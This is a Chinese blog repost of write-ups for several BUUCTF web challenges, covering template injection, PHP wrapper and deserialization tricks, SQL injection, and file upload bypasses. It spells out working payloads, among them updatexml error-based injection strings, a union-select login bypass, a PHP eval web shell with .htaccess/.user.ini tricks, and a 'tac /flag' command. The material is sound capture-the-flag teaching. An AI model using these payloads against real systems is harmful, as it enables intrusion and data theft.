buu刷题(2)

news2025/1/13 5:59:06

[护网杯 2018]easy_tornado

web buuctf [护网杯 2018]easy_tornado1_[护网杯 2018]easy_tornado 1-CSDN博客

render是渲染HTML页面用到的函数
这应该是一个模板注入漏洞

访问/fllllllllllllag,自动跳到了这个页面,可以看到 url 上有个msg=Error,
尝试将  Error 更换成其他的值,可以发现有回显

 所以就可以通过msg的值进行传参,得到想要的内容
从提升来看,我们需要获得cookie_secret的值

web buuctf [护网杯 2018]easy_tornado1_[护网杯 2018]easy_tornado 1-CSDN博客

(大佬博客有解析)
传参  {{handler.settings}}  可以获得cookie_secret的值

根据提示需要将 它的值 加上filename(/fllllllllllllag)的MD5值 在进行MD5加密 ,得到flag

[ZJCTF 2019]NiZhuanSiWei

分析代码,需要GET传参  text&file&password  三个参数,file 传参的值不能有flag,password传参的值会反序列化,file_get_contents 得到文件里的内容,并且还要与 welcome to the zjctf 
相等,应该是找不到这样的文件的
,所以使用 data 伪协议绕过,
?text=data://text/plain,welcome to the zjctf&file=useless.php ,但是依旧没有反应,
可能  include(useless.php) ,直接执行了,没有把源码显示出来,所以依旧使用伪协议绕过
?text=data://text/plain,welcome to the zjctf&file=php://filter/convert.base64-encode/resource=useless.php

  然后将其base64解码

本地运行一下,将得到的值传入password

?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}          (这个时候file传参的值就不要用伪协议绕过了,因为需要他去执行代码)

[极客大挑战 2019]HardSQL

先测试一下 1 ,1'  ,1"  ,可以发现应该为单引号型的
再爆一下字段数  order by  ,可以发现是被过滤了,尝试双写绕不过

再试试联合注入,union  被过滤了,  空格也被过滤了
尝试一下报错注入
1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),1))#         可以成功 ,继续

1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),1))# 

1'or(updatexml(1,concat(0x7e,(select(group_concat(id,0x7e,username,0x7e,password))from(H4rDsq1))),1))# 

因为长度的限制,使用right函数来获取另一半
1'or(updatexml(1,concat(0x7e,(select(group_concat(right(password,30)))from(H4rDsq1))),1))# 

将得到两份flag拼凑一下就行

[MRCTF2020]Ez_bypass

MD5强比较:传数组
password弱比较,直接传参password=1234567a,  即可得到flag

[网鼎杯 2020 青龙组]AreUSerialz

分析代码,对GET传参的 str 值反序列化,我们需要 read()这个函数 ,去读取flag.php,得到flag,所以将op的值改为2,file的值为flag.php,但是__destruct()会将op的值改为2,需要将它绕过,
一个是强比较,一个是弱比较,通过这个绕过,赋值 op=2 (整数型),绕过__destruct()

本地运行一下,运行的结果赋值给   str  ,可以得到flag

[SUCTF 2019]CheckIn

文件上传的题,直接上传一个图片码,抓包修改数据

内容有问题,应该是过滤了什么,用二分法将它排查出来,可知是过滤了?
用   <script language='php'>@eval($_POST[1])</script>  绕过,可以上传

但是 .png 后缀无法解析代码,需要在上传  .user.ini  ,将  .png 能够当作php文件解析

然后在上传 1.png 文件 ,

直接进行命令执行 (也可以连接蚁剑)

        POST传参        1=system("tac /flag");

[GXYCTF2019]BabySQli

测试后可知 是单引号型的注入
但是过滤了好多东西,双写,报错注入啥的都没有用,抓包之后可以看到有一个编码

先base64再base32
(工具:CyberChef)

试了很多一直是      报错:wrong user!

试了 admin    ,终于不一样了,报错是:wrong pass!

可能  name应该是必须要有admin
在测试列数,这样3列的时候会显示 wrong pass

应该是对密码做了什么操作,有点懵
https://www.cnblogs.com/Cl0ud/p/12604647.html

BUUCTF [GXYCTF2019]BabySQli实战_babysqliv2.0-CSDN博客

看了wp 后,是对密码进行了MD5加密,需要匹配用户名为  admin  的密码的MD5

(为什么可以知道进行了MD5加密,可以在password框里输入一些会报错的语句,但是如果没有报错,就能确定是进行了加密的,密码一般是MD5加密)
但我们又不可能知道密码,需要将它绕过,使用 联合查询 union select
联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据
不知道3个字段里哪个为密码的字段,可以多尝试几遍

name=111' union select 1,'admin','e10adc3949ba59abbe56e057f20f883e';#&pw=123456

但是name后面不能是admin了,要不然就会密码不正确
name=admin' union select 1,'admin','e10adc3949ba59abbe56e057f20f883e';#&pw=123456

[GXYCTF2019]BabyUpload

随便上传一个php文件,不允许上传,抓包更改数据

可以成功,但是浏览器无法解析  .png 里的代码,无法执行命令

尝试传了一下 .user.ini 没有用,好像upload下没有index.php,  .user.ini 发挥不了作用

尝试传 .htaccess
内容为:
GIF89a(好像没有也可以,一般习惯放上去)
AddType application/x-httpd-php .png
然后再上传  1.png 
<script language='php'>@eval($_POST[1])</script>
 命令执行一下发现可以成功

蚁剑连一下,或者命令执行  ,

[MRCTF2020]你传你🐎呢

随便传个文件,抓包修改,对于php,phtml 等后缀都上传不了,.png后缀可以上传

上传了  .user.ini  依旧不能解析代码,无法命令执行,当前目录没有index.php
尝试使用  .htaccess

进入到相应页面,可以命令执行,上传成功

直接蚁剑连一下,拿到flag

[GYCTF2020]Blacklist

用1' 会报错,单字符型

1' or 1#  万能密码也有用

1' order by 2 正常回显,by 3  报错, 字段数为2
1' union selcct 1,3#  过滤了一些东西

1';show databases;# 

1';show tables;#

1';show columns from FlagHere;#

使用handler语句读取数据
1';handler FlagHere open;handler FlagHere read next;

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1570016.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Node.js------模块化

◆ 能够说出模块化的好处◆ 能够知道 CommonJS 规定了哪些内容◆ 能够说出 Node.js 中模块的三大分类各自是什么◆ 能够使用 npm 管理包◆ 能够了解什么是规范的包结构◆ 能够了解模块的加载机制 一.模块化的基本概念 1.模块化 模块化是指解决一个复杂问题时&#xff0c…

大商创多用户商城系统 多处SQL注入漏洞复现

0x01 产品简介 大商创多用户商城系统是一个功能强大、灵活多变的新零售电商系统服务商。该系统支持平台自营和商家入驻,实现多元化经营模式,能够全面整合供应商、生产商、经销商和消费者等产业链资源,提高产品多样性,加快资金流动速度,并有助于减少不必要的成本输出。 0…

交换机特性解析

​1. 端口数量和类型: RJ-45端口: 最常见的端口类型,用于连接网线。 铜缆类型: 超五类、六类、七类等,影响传输速率和距离。 PoE功能: 支持为连接的设备供电,如IP电话、无线AP等。 光纤端口: 用于连接光纤,支持更长的传输距离和更高的速率。 光纤类型: 单模、多模等,影响传…

【核弹级安全事件】XZ Utils库中发现秘密后门,影响主要Linux发行版,软件供应链安全大事件

Red Hat 发布了一份“紧急安全警报”&#xff0c;警告称两款流行的数据压缩库XZ Utils&#xff08;先前称为LZMA Utils&#xff09;的两个版本已被植入恶意代码后门&#xff0c;这些代码旨在允许未授权的远程访问。 此次软件供应链攻击被追踪为CVE-2024-3094&#xff0c;其CVS…

计算机服务器中了halo勒索病毒怎么办,halo勒索病毒解密流程步骤

随着网络技术的不断应用&#xff0c;企业的生产运营得到了快速发展&#xff0c;越来越多的企业开始利用服务器数据库存储企业的重要信息文件&#xff0c;数据库为企业的生产运营提供了极大便利&#xff0c;但网络技术的不断发展也为企业的数据安全带来严重威胁。近日&#xff0…

IP-guard WebServer 任意文件读取漏洞复现

0x01 产品简介 IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。 0x02 漏洞概述 由于IP-guard WebServer /ipg/static/appr/lib/flexpaper/php/view.php接口处未对用户输入的数据进行严…

C语言------冒泡法排序

一.前情提要 1.介绍 冒泡法排序法&#xff1a; 1)冒泡排序&#xff08;Bubble Sort&#xff09;是一种简单的排序算法&#xff0c;它重复地遍历要排序的列表&#xff0c;一次比较相邻的两个元素&#xff0c;并且如果它们的顺序错误就将它们交换过来。重复这个过程直到没有需…

聚酰亚胺PI材料难于粘接,用什么胶水粘接?那么让我们先一步步的从认识它开始(十八): 聚酰亚胺PI泡沫有哪些应用领域

聚酰亚胺PI泡沫有哪些应用领域 聚酰亚胺&#xff08;PI&#xff09;泡沫由于其一系列优异的特性&#xff0c;在许多高性能应用领域中都有广泛的应用&#xff0c;包括但不限于&#xff1a; 航空航天领域&#xff1a;聚酰亚胺PI泡沫由于其出色的耐高温、隔热和阻燃性能&#xff0…

C语言 循环控制——计数控制的循环

目录 循环语句 for语句 小结 循环结构有什么用&#xff1f; 国外某男子攻打自己的女友&#xff0c;并导致女友受伤&#xff0c;法官除判处他监禁和提供金钱补偿外&#xff0c;还处罚他抄写5000遍道歉辞&#xff1a; “Boys do not hit girls.” 循环的控制方法 循环语句 f…

Java NIO是New IO还是Non-blocking IO

文章目录 前言NIO到底叫啥通过对比理解NIO传统IO网络编程NIO引入的新概念NIO网络编程两者区别NIO的事件驱动 总结 前言 很多小伙伴对Java NIO的一些概念和编程不是很理解&#xff0c;希望通过本文对Java NIO与传统IO的对比&#xff0c;可以帮助大家更好地理解和掌握Java NIO。…

k8s存储卷 PV与PVC 理论学习

介绍 存储的管理是一个与计算实例的管理完全不同的问题。PersistentVolume 子系统为用户和管理员提供了一组 API&#xff0c;将存储如何制备的细节从其如何被使用中抽象出来。为了实现这点&#xff0c;我们引入了两个新的 API 资源&#xff1a;PersistentVolume 和 Persistent…

intellij idea 使用git撤销(取消)commit

git撤销(取消) 未 push的 commit Git&#xff0c;选择分支后&#xff0c;右键 Undo Commit &#xff0c;会把这个 commit 撤销。 git撤销(取消) 已经 push 的 commit 备份分支内容&#xff1a; 选中分支&#xff0c; 新建 分支&#xff0c;避免后续因为操作不当&#xff0c;导…

网络原理 - HTTP / HTTPS(4)——构造http请求

目录 一、postman 的下载安装以及简单介绍 1、下载安装 2、postman的介绍 二、通过 Java socket 构造 HTTP 请求 构造http请求的方式有两种&#xff1a;&#xff08;1&#xff09;通过代码构造&#xff08;有一点难度&#xff09; &#xff08;2&#xff09;通过第三…

【C++】探索C++中的类与对象(上)

​​ &#x1f331;博客主页&#xff1a;青竹雾色间. &#x1f618;博客制作不易欢迎各位&#x1f44d;点赞⭐收藏➕关注 ✨人生如寄&#xff0c;多忧何为 ✨ C是一种强大的编程语言&#xff0c;其面向对象的特性使得代码结构更加清晰、易于维护和扩展。在C中&#xff0c;类与…

文件同步工具哪个好

背景 今天介绍一款文件实时同步工具PanguFlow,它能够实时地监控源端文件夹的变化&#xff0c;然后将这种变化实时同步到目标端&#xff0c;对于文件灾备冗余的场景可谓是再合适不过了&#xff0c;一些老铁可能有这样的需求&#xff0c;比如两台服务器需要做文件的双机热备&…

乐知付-如何制作html文件可双击跳转到指定页面?

标题: 乐知付-如何制作html文件可双击跳转到指定页面&#xff1f; 标签: [乐知付, 乐知付加密, 密码管理] 分类: [网站,html] 为了便于买家理解使用链接进行付费获取密码&#xff1b;现开发个小工具&#xff0c;将支付链接转为浏览器可识别的文件&#xff0c;双击打开即可跳转到…

游戏引擎中的粒子系统

一、粒子基础 粒子系统里有各种发射器&#xff08;emitter&#xff09;&#xff0c;发射器发射粒子&#xff08;particle&#xff09;。 粒子是拥有位置、速度、大小尺寸、颜色和生命周期的3D模型。 粒子的生命周期中&#xff0c;包含产生&#xff08;Spawn&#xff09;、与环…

以太网布局指南

2层板 顶层走信号线以及地平面底层走信号线以及地平面信号走线应至少沿一条边被接地或接地走线包围如果使用地走线&#xff0c;应接本层接地平面&#xff0c;与上层接地平面解耦。 4层板 当信号走线被重新引用到功率平面时&#xff0c;在地平面和功率平面之间需要去耦电容器(0…

9、逆序对的数量(含源码)

逆序对的数量 难度&#xff1a;简单 题目描述 给定一个长度为n的整数数列&#xff0c;请你计算数列中的逆序对的数量。 逆序对的定义如下&#xff1a;对于数列的第 i 个和第 j 个元素&#xff0c;如果满足 i < j 且 a[i] > a[j]&#xff0c;则其为一个逆序对&#xf…